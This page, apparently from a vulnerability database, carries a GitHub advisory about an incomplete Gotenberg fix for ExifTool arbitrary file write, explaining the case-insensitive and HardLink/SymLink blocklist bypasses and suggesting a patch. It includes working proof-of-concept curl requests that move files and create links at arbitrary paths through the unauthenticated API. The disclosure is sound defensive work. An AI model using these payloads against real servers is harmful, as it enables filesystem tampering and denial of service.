N/A

CVSS Score

-

CVSS Score

Basic Information

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

GHSA-qmwh-9m9c-h36m

GHSA-qmwh-9m9c-h36m: Gotenberg has incomplete fix for ExifTool arbitrary file write: case-insensitive bypass and missing HardLink/SymLink tags

Summary

The fix for ExifTool arbitrary file write (commit 043b158, released in v8.29.0) uses a case-sensitive blocklist to filter dangerous pseudo-tags. ExifTool processes tag names case-insensitively, so alternate casings bypass the filter. The blocklist also omits the HardLink and SymLink pseudo-tags entirely.

Confirmed end-to-end against Gotenberg v8.29.1 via the unauthenticated HTTP API.

Root Cause

pkg/modules/exiftool/exiftool.go lines 231-237:

dangerousTags := []string{
    "FileName",  // Writing this triggers a file rename in ExifTool
    "Directory", // Writing this triggers a file move in ExifTool
}
for _, tag := range dangerousTags {
    delete(metadata, tag)
}

Go's delete(metadata, tag) is case-sensitive. It only removes the exact keys "FileName" and "Directory". ExifTool processes tag names case-insensitively (per ExifTool documentation). Alternate casings like filename, FILENAME, directory all bypass the Go blocklist but ExifTool treats them identically.

The go-exiftool library passes tag names directly to ExifTool's stdin at line 258:

fmt.Fprintln(e.stdin, "-"+k+"="+str)

So filename becomes -filename=/attacker/path which ExifTool interprets as -FileName=/attacker/path.

The blocklist also omits two dangerous ExifTool pseudo-tags:

HardLink: creates a hard link to the file at the specified path
SymLink: creates a symbolic link to the file at the specified path

PoC

All three vectors confirmed against a running Gotenberg v8.29.1 Docker container.

Case-insensitive filename bypass (file moved to /tmp/evil_bypass.pdf):

curl -X POST http://localhost:3000/forms/pdfengines/metadata/write \
  -F files=@sample.pdf \
  -F 'metadata={"filename": "/tmp/evil_bypass.pdf"}'

HardLink (hard link created at /tmp/hardlink_bypass.pdf):

curl -X POST http://localhost:3000/forms/pdfengines/metadata/write \
  -F files=@sample.pdf \
  -F 'metadata={"HardLink": "/tmp/hardlink_bypass.pdf"}'

SymLink (symbolic link created at /tmp/symlink_bypass.pdf):

curl -X POST http://localhost:3000/forms/pdfengines/metadata/write \
  -F files=@sample.pdf \
  -F 'metadata={"SymLink": "/tmp/symlink_bypass.pdf"}'

Verification inside the container:

$ docker exec gotenberg-poc ls -la /tmp/evil_bypass.pdf /tmp/hardlink_bypass.pdf /tmp/symlink_bypass.pdf
-rw-r--r-- 1 gotenberg gotenberg 321 ... /tmp/evil_bypass.pdf
-rw-r--r-- 1 gotenberg gotenberg 321 ... /tmp/hardlink_bypass.pdf
lrwxrwxrwx 1 gotenberg gotenberg 119 ... /tmp/symlink_bypass.pdf -> /tmp/.../source.pdf

Also confirmed ExifTool case-insensitivity directly:

exiftool -filename=bypassed.pdf test.pdf  # Works identically to -FileName=

Impact

An attacker with access to the Gotenberg API (unauthenticated by default) can:

Rename/move uploaded PDFs to arbitrary filesystem paths via lowercase filename/directory
Create hard links at arbitrary paths via HardLink, persisting data beyond temp directory cleanup
Create symbolic links at arbitrary paths via SymLink

In containerized deployments, impact is limited to the container filesystem (DoS by overwriting temp files). In bare-metal deployments or those with shared volumes, this can affect other services.

Suggested Fix

Use case-insensitive comparison and expand the blocklist:

dangerousTags := []string{
    "FileName",
    "Directory",
    "HardLink",
    "SymLink",
}
for key := range metadata {
    for _, tag := range dangerousTags {
        if strings.EqualFold(key, tag) {
            delete(metadata, key)
        }
    }
}

(GitHub Advisory)

Miggo Vulnerability Database

→

GHSA-qmwh-9m9c-h36m

GHSA-qmwh-9m9c-h36m:

N/A

CVSS Score

-

CVSS Score

Basic Information

Is this CVE running in your environment?

Easily map the attack path and prioritize which CVEs are a threat to your organization

Validate Exposure

Technical Details

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
github.com/gotenberg/gotenberg/v8	go	<= 8.29.1	8.30.0

Technical Details

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability is located in the WriteMetadata function of the ExifTool engine in pkg/modules/exiftool/exiftool.go. The function's purpose is to write metadata to PDF files using the ExifTool command-line utility. The vulnerability stems from an incomplete security fix that attempted to block dangerous metadata tags. The initial implementation used a case-sensitive filter to remove tags like "FileName" and "Directory". However, ExifTool processes these tags case-insensitively, allowing an attacker to bypass the filter by using lowercase or mixed-case variations. Furthermore, the blocklist failed to include other dangerous tags such as "HardLink" and "SymLink". The provided commit patch rectifies these issues by introducing a case-insensitive comparison (strings.EqualFold) for the tags and by adding the previously omitted dangerous tags to the blocklist. An attacker could have exploited this to rename, move, or create links to files on the server's filesystem, leading to potential denial of service or other security impacts depending on the deployment environment.

Vulnerable functions

ExifTool.WriteMetadata

pkg/modules/exiftool/exiftool.go

The function `WriteMetadata` in `pkg/modules/exiftool/exiftool.go` was vulnerable because it used a case-sensitive blocklist to filter dangerous ExifTool pseudo-tags. Since ExifTool processes tags case-insensitively, an attacker could bypass this filter by providing tags with different casings (e.g., 'filename' instead of 'FileName'). The blocklist was also incomplete, missing the 'HardLink' and 'SymLink' tags, which could be used to create hard or symbolic links on the filesystem. The patch corrects this by implementing a case-insensitive check and expanding the blocklist.

Vulnerability Intelligence
Miggo AI

Unlock WAF rules for this CVE

Generate vendor-ready rules for the observed attack patterns, plus reasoning and safe deployment guidance

Get WAF rules

WAF Protection Rules

WAF Rule

W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.

Reasoning

*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.